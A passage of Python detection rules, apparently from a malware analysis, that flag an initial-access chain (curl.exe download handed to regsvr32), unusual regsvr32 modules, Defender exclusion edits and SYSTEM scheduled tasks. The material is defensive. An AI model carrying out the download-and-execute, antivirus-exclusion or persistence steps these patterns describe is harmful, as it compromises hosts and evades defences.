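    """cmd.exe one-liner that downloads with `curl.exe -o` and then hands the
    file to regsvr32: the initial-access chain seen in telemetry."""
    if event["name"].lower() != "cmd.exe":
        return False
    cmdline = event.get("command_line", "").lower()
    return "curl.exe" in cmdline and " -o " in cmdline and "regsvr32" in cmdline


def regsvr32_unusual_module(event):
    """regsvr32 registering a module without a .dll extension (v4QpQt.Nqv.e8xO)
    or one under the user's roaming AppData folder (the maonyo.dll copy)."""
    if event["name"].lower() != "regsvr32.exe":
        return False
    modules = [a.strip('"').lower() for a in event.get("args", [])[1:]
               if not a.startswith(("-", "/"))]
    return any(not m.endswith(".dll") or "\\appdata\\roaming\\" in m for m in modules)


def defender_exclusion_added(event):
    """reg.exe ADD anywhere under the Windows Defender Exclusions key."""
    if event["name"].lower() != "reg.exe":
        return False
    args = _lower_args(event)
    return "add" in args and any("\\windows defender\\exclusions\\" in a for a in args)


def system_task_runs_regsvr32(event):
    """schtasks /Create with /RU SYSTEM whose action (/tr) runs regsvr32."""
    if event["name"].lower() != "schtasks.exe":
        return False
    args = _lower_args(event)
    if "/create" not in args or "/ru" not in args or "/tr" not in args:
        return False
    run_as = args[args.index("/ru") + 1]
    action = args[args.index("/tr") + 1]
    return run_as in ("system", "nt authority\\system") and "regsvr32" in action


RULES = {
    "initial_access_curl_then_regsvr32": curl_then_regsvr32,
    "regsvr32_unusual_module_path": regsvr32_unusual_module,
    "defender_exclusion_path_added": defender_exclusion_added,
    "system_scheduled_task_runs_regsvr32": system_task_runs_regsvr32,
}


def evaluate(events, rules=RULES):
    """Map rule name -> ids of matching events; rules with no hits are omitted."""
    hits = {}
    for event in events:
        for name, rule in rules.items():
            if rule(event):
                hits.setdefault(name, []).append(event["id"])
    return hits


if __name__ == "__main__":
    for name, ids in evaluate(EVENTS).items():
        print(f"{name}: events {ids}")
```

The four rules line up with the alerts the article lists under Detections (scheduled task creation, Run key modification and the reg.exe exclusion are all visible from process arguments alone); the benign event shows that a vendor DLL registered from Program Files with `/s` produces no hit.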